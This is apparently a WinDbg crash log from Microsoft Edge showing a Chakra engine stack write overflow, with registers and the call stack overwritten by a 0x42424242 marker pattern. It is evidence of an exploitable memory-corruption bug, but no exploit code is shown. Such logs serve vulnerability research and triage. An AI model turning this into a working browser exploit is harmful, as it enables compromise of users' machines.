ModLoad: 00007ffe`a0ee0000 00007ffe`a11d9000 C:\Windows\System32\combase.dll
ModLoad: 00007ffe`9e7e0000 00007ffe`9e8d6000 C:\Windows\System32\ucrtbase.dll
ModLoad: 00007ffe`a0d00000 00007ffe`a0e25000 C:\Windows\System32\RPCRT4.dll
ModLoad: 00007ffe`9ebc0000 00007ffe`9ec2a000 C:\Windows\System32\bcryptPrimitives.dll
ModLoad: 00007ffe`a0c50000 00007ffe`a0ced000 C:\Windows\System32\msvcrt.dll
ModLoad: 00007ffe`98900000 00007ffe`98960000 C:\Windows\SYSTEM32\wincorlib.DLL
ModLoad: 00007ffe`a1de0000 00007ffe`a1ea0000 C:\Windows\System32\OLEAUT32.dll
ModLoad: 00007ffe`9ea70000 00007ffe`9eb0a000 C:\Windows\System32\msvcp_win.dll
ModLoad: 00007ffe`9e330000 00007ffe`9e341000 C:\Windows\System32\kernel.appcore.dll
ModLoad: 00007ffe`7d930000 00007ffe`7dcf4000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\EdgeContent.dll
ModLoad: 00007ffe`9ece0000 00007ffe`9f3d2000 C:\Windows\System32\Windows.Storage.dll
ModLoad: 00007ffe`a0b90000 00007ffe`a0c31000 C:\Windows\System32\advapi32.dll
ModLoad: 00007ffe`9f400000 00007ffe`9f459000 C:\Windows\System32\sechost.dll
ModLoad: 00007ffe`96080000 00007ffe`96306000 C:\Windows\SYSTEM32\iertutil.dll
ModLoad: 00007ffe`a13b0000 00007ffe`a1401000 C:\Windows\System32\shlwapi.dll
ModLoad: 00007ffe`a0e30000 00007ffe`a0eda000 C:\Windows\System32\shcore.dll
ModLoad: 00007ffe`9f460000 00007ffe`9f487000 C:\Windows\System32\GDI32.dll
ModLoad: 00007ffe`9e8e0000 00007ffe`9ea69000 C:\Windows\System32\gdi32full.dll
ModLoad: 00007ffe`a1c90000 00007ffe`a1dda000 C:\Windows\System32\USER32.dll
ModLoad: 00007ffe`9f3e0000 00007ffe`9f3fe000 C:\Windows\System32\win32u.dll
ModLoad: 00007ffe`9e370000 00007ffe`9e3bc000 C:\Windows\System32\powrprof.dll
ModLoad: 00007ffe`9e310000 00007ffe`9e325000 C:\Windows\System32\profapi.dll
ModLoad: 00007ffe`9e210000 00007ffe`9e239000 C:\Windows\SYSTEM32\USERENV.dll
ModLoad: 00007ffe`8d040000 00007ffe`8d066000 C:\Windows\SYSTEM32\clipc.dll
ModLoad: 00007ffe`9d610000 00007ffe`9d641000 C:\Windows\SYSTEM32\ntmarta.dll
ModLoad: 00007ffe`9dd60000 00007ffe`9dd77000 C:\Windows\SYSTEM32\cryptsp.dll
ModLoad: 00007ffe`9d9a0000 00007ffe`9da44000 C:\Windows\SYSTEM32\DNSAPI.dll
ModLoad: 00007ffe`a18b0000 00007ffe`a191c000 C:\Windows\System32\WS2_32.dll
ModLoad: 00007ffe`a0b20000 00007ffe`a0b28000 C:\Windows\System32\NSI.dll
ModLoad: 00007ffe`a0a40000 00007ffe`a0a6d000 C:\Windows\System32\IMM32.DLL
ModLoad: 00007ffe`9d960000 00007ffe`9d997000 C:\Windows\SYSTEM32\IPHLPAPI.DLL
ModLoad: 00007ffe`9ccc0000 00007ffe`9ce30000 C:\Windows\SYSTEM32\twinapi.appcore.dll
ModLoad: 00007ffe`9e1e0000 00007ffe`9e205000 C:\Windows\SYSTEM32\bcrypt.dll
ModLoad: 00007ffe`9d440000 00007ffe`9d461000 C:\Windows\SYSTEM32\profext.dll
ModLoad: 00007ffe`8c940000 00007ffe`8c9b4000 C:\Windows\SYSTEM32\msiso.dll
ModLoad: 00007ffe`983e0000 00007ffe`98402000 C:\Windows\SYSTEM32\EShims.dll
ModLoad: 00007ffe`90b10000 00007ffe`90b2b000 C:\Windows\SYSTEM32\MPR.dll
ModLoad: 00007ffe`a1920000 00007ffe`a1a65000 C:\Windows\System32\ole32.dll
ModLoad: 00007ffe`9cab0000 00007ffe`9cb45000 C:\Windows\system32\uxtheme.dll
ModLoad: 00007ffe`8b6f0000 00007ffe`8b791000 C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll
ModLoad: 00007ffe`81fa0000 00007ffe`83651000 C:\Windows\SYSTEM32\edgehtml.dll
ModLoad: 00007ffe`9a690000 00007ffe`9a7c9000 C:\Windows\SYSTEM32\wintypes.dll
ModLoad: 00007ffe`915c0000 00007ffe`915ff000 C:\Windows\SYSTEM32\MLANG.dll
ModLoad: 00007ffe`80f50000 00007ffe`8173a000 C:\Windows\SYSTEM32\chakra.dll
ModLoad: 00007ffe`9afe0000 00007ffe`9b056000 C:\Windows\SYSTEM32\policymanager.dll
ModLoad: 00007ffe`9af20000 00007ffe`9afaf000 C:\Windows\SYSTEM32\msvcp110_win.dll
ModLoad: 00007ffe`9b2d0000 00007ffe`9b466000 C:\Windows\SYSTEM32\PROPSYS.dll
ModLoad: 00007ffe`88e90000 00007ffe`88f5b000 C:\Windows\System32\ieproxy.dll
ModLoad: 00007ffe`98590000 00007ffe`98696000 C:\Windows\System32\Windows.UI.dll
ModLoad: 00007ffe`98500000 00007ffe`98582000 C:\Windows\SYSTEM32\TextInputFramework.dll
ModLoad: 00007ffe`99ad0000 00007ffe`99da2000 C:\Windows\SYSTEM32\CoreUIComponents.dll
ModLoad: 00007ffe`9c1d0000 00007ffe`9c2b3000 C:\Windows\SYSTEM32\CoreMessaging.dll
ModLoad: 00007ffe`9ae40000 00007ffe`9ae55000 C:\Windows\SYSTEM32\usermgrcli.dll
ModLoad: 00007ffe`98f20000 00007ffe`99451000 C:\Windows\System32\OneCoreUAPCommonProxyStub.dll
ModLoad: 00007ffe`9b470000 00007ffe`9b49a000 C:\Windows\SYSTEM32\dwmapi.dll
ModLoad: 00007ffe`9f490000 00007ffe`a08c7000 C:\Windows\System32\shell32.dll
ModLoad: 00007ffe`9ec30000 00007ffe`9ec79000 C:\Windows\System32\cfgmgr32.dll
ModLoad: 00007ffe`a08d0000 00007ffe`a0a36000 C:\Windows\System32\msctf.dll
ModLoad: 00007ffe`98700000 00007ffe`98802000 C:\Windows\SYSTEM32\mrmcorer.dll
ModLoad: 00007ffe`8d070000 00007ffe`8d39e000 C:\Windows\SYSTEM32\WININET.dll
ModLoad: 00007ffe`9e240000 00007ffe`9e270000 C:\Windows\SYSTEM32\SspiCli.dll
ModLoad: 00007ffe`98860000 00007ffe`988c9000 C:\Windows\SYSTEM32\Bcp47Langs.dll
ModLoad: 00007ffe`8a7c0000 00007ffe`8a7d0000 C:\Windows\SYSTEM32\tokenbinding.dll
ModLoad: 00007ffe`8d800000 00007ffe`8d81b000 C:\Windows\SYSTEM32\ondemandconnroutehelper.dll
ModLoad: 00007ffe`963d0000 00007ffe`964a7000 C:\Windows\SYSTEM32\winhttp.dll
ModLoad: 00007ffe`9dbc0000 00007ffe`9dc1c000 C:\Windows\system32\mswsock.dll
ModLoad: 00007ffe`9a290000 00007ffe`9a29b000 C:\Windows\SYSTEM32\WINNSI.DLL
ModLoad: 00007ffe`957f0000 00007ffe`959b8000 C:\Windows\SYSTEM32\urlmon.dll
ModLoad: 00007ffe`9dd80000 00007ffe`9dd8b000 C:\Windows\SYSTEM32\CRYPTBASE.DLL
ModLoad: 00007ffe`8ca20000 00007ffe`8ca3a000 C:\Windows\System32\Windows.Shell.ServiceHostBuilder.dll
ModLoad: 00007ffe`7fed0000 00007ffe`8005a000 C:\Windows\SYSTEM32\ieapfltr.dll
ModLoad: 00007ffe`999d0000 00007ffe`999ed000 C:\Windows\System32\rmclient.dll
ModLoad: 00007ffe`89aa0000 00007ffe`89ab8000 C:\Windows\System32\UiaManager.dll
ModLoad: 00007ffe`8a860000 00007ffe`8a8a7000 C:\Windows\system32\dataexchange.dll
ModLoad: 00007ffe`9c2c0000 00007ffe`9c3e2000 C:\Windows\SYSTEM32\dcomp.dll
ModLoad: 00007ffe`9b940000 00007ffe`9bc1f000 C:\Windows\SYSTEM32\d3d11.dll
ModLoad: 00007ffe`9d180000 00007ffe`9d224000 C:\Windows\SYSTEM32\dxgi.dll
ModLoad: 00007ffe`8bb90000 00007ffe`8bc12000 C:\Windows\system32\twinapi.dll
ModLoad: 00007ffe`84db0000 00007ffe`84e2a000 C:\Windows\SYSTEM32\windows.ui.core.textinput.dll
ModLoad: 00007ffe`81c30000 00007ffe`81c58000 C:\Windows\SYSTEM32\srpapi.dll
ModLoad: 00007ffe`9e3c0000 00007ffe`9e589000 C:\Windows\System32\CRYPT32.dll
ModLoad: 00007ffe`9e350000 00007ffe`9e361000 C:\Windows\System32\MSASN1.dll
ModLoad: 00007ffe`846e0000 00007ffe`8473a000 C:\Windows\System32\Windows.Graphics.dll
ModLoad: 00007ffe`8cf00000 00007ffe`8cf5d000 C:\Windows\SYSTEM32\ninput.dll
ModLoad: 00007ffe`9bc20000 00007ffe`9c1c4000 C:\Windows\SYSTEM32\d2d1.dll
ModLoad: 00007ffe`943a0000 00007ffe`94660000 C:\Windows\SYSTEM32\DWrite.dll
ModLoad: 00007ffe`81910000 00007ffe`8191f000 C:\Windows\System32\Windows.Internal.SecurityMitigationsBroker.dll
ModLoad: 00007ffe`99510000 00007ffe`99552000 C:\Windows\SYSTEM32\vm3dum64.dll
ModLoad: 00007ffe`994a0000 00007ffe`99507000 C:\Windows\SYSTEM32\D3D10Level9.dll
ModLoad: 00007ffe`8b4b0000 00007ffe`8b51b000 C:\Windows\System32\oleacc.dll
ModLoad: 00007ffe`81bf0000 00007ffe`81c00000 C:\Windows\system32\msimtf.dll
ModLoad: 00007ffe`940f0000 00007ffe`94178000 C:\Windows\system32\directmanipulation.dll
ModLoad: 00007ffe`98170000 00007ffe`98184000 C:\Windows\System32\Windows.System.Profile.PlatformDiagnosticsAndUsageDataSettings.dll
ModLoad: 00007ffe`81bb0000 00007ffe`81be8000 C:\Windows\System32\smartscreenps.dll
ModLoad: 00007ffe`94210000 00007ffe`94398000 C:\Windows\SYSTEM32\windows.globalization.dll
ModLoad: 00007ffe`8b520000 00007ffe`8b6e5000 C:\Windows\System32\uiautomationcore.dll
(1590.5d8): Break instruction exception - code 80000003 (first chance)
ntdll!DbgBreakPoint:
00007ffe`a1f48d70 cc int 3
0:035> g
onecoreuap\inetcore\urlmon\zones\zoneidentifier.cxx(359)\urlmon.dll!00007FFE958108C0: (caller: 00007FFE9580F77D) ReturnHr(2) tid(b70) 80070002 œµÕ≥’“≤ªµΩ÷∏∂®µƒŒƒº˛°£
(1590.b70): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
chakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d:
00007ffe`8133ba8d 488904d1 mov qword ptr [rcx+rdx*8],rax ds:000000d8`b8400000=????????????????
0:016> r
rax=0001000042424242 rbx=000002aa98205cbb rcx=000000d8b83f9e98
rdx=0000000000000c2d rsi=0000000000000000 rdi=000002aa98200025
rip=00007ffe8133ba8d rsp=000000d8b83f9bd0 rbp=000000d8b83f9c00
r8=000000d8b83f9d20 r9=000002aa8688fe00 r10=000002aa86879760
r11=000000d8b83f9978 r12=0000000000000000 r13=000002aa8312a270
r14=0000000000000000 r15=000002aa98205cc2
iopl=0 nv up ei pl nz ac pe nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010212
chakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d:
00007ffe`8133ba8d 488904d1 mov qword ptr [rcx+rdx*8],rax ds:000000d8`b8400000=????????????????
0:016> dq ecx
000000d8`b83f9e98 00000000`00000030 000002aa`86879760
000000d8`b83f9ea8 00010000`42424242 00010000`42424242
000000d8`b83f9eb8 00010000`42424242 00010000`42424242
000000d8`b83f9ec8 00010000`42424242 00010000`42424242
000000d8`b83f9ed8 00010000`42424242 00010000`42424242
000000d8`b83f9ee8 00010000`42424242 00010000`42424242
000000d8`b83f9ef8 00010000`42424242 00010000`42424242
000000d8`b83f9f08 00010000`42424242 00010000`42424242
0:016> dq [ecx+edx*8]
000000d8`b8400000 ????????`???????? ????????`????????
000000d8`b8400010 ????????`???????? ????????`????????
000000d8`b8400020 ????????`???????? ????????`????????
000000d8`b8400030 ????????`???????? ????????`????????
000000d8`b8400040 ????????`???????? ????????`????????
000000d8`b8400050 ????????`???????? ????????`????????
000000d8`b8400060 ????????`???????? ????????`????????
000000d8`b8400070 ????????`???????? ????????`????????
0:016> !address 000000d8`b8400000
Usage:
Allocation Base: 000000d8`b8400000
Base Address: 000000d8`b8400000
End Address: 000000d8`b84fc000
Region Size: 00000000`000fc000
Type: 00020000 MEM_PRIVATE
State: 00002000 MEM_RESERVE
Protect: 00000000
More info: ~17k
0:016> !address ecx
Usage: Stack
Allocation Base: 000000d8`b7a00000
Base Address: 000000d8`b83f4000
End Address: 000000d8`b8400000
Region Size: 00000000`0000c000
Type: 00020000 MEM_PRIVATE
State: 00001000 MEM_COMMIT
Protect: 00000004 PAGE_READWRITE
More info: ~16k
0:016> kb
RetAddr : Args to Child : Call Site
00007ffe`8120a2a5 : 000000d8`b83f9d20 000002aa`98205cbb 000000d8`b83f9c60 000002aa`98205cbb : chakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d
00007ffe`810fa321 : 000000d8`b83f9d20 00000000`00000000 00000000`00000000 00000000`00000000 : chakra!Js::InterpreterStackFrame::ProcessUnprofiled+0x10fec5
00007ffe`8102aeac : 000000d8`b83f9d20 000002aa`96ad0000 000000d8`b83f9ea0 000002aa`8312dc00 : chakra!Js::InterpreterStackFrame::Process+0x1b1
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4ac
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
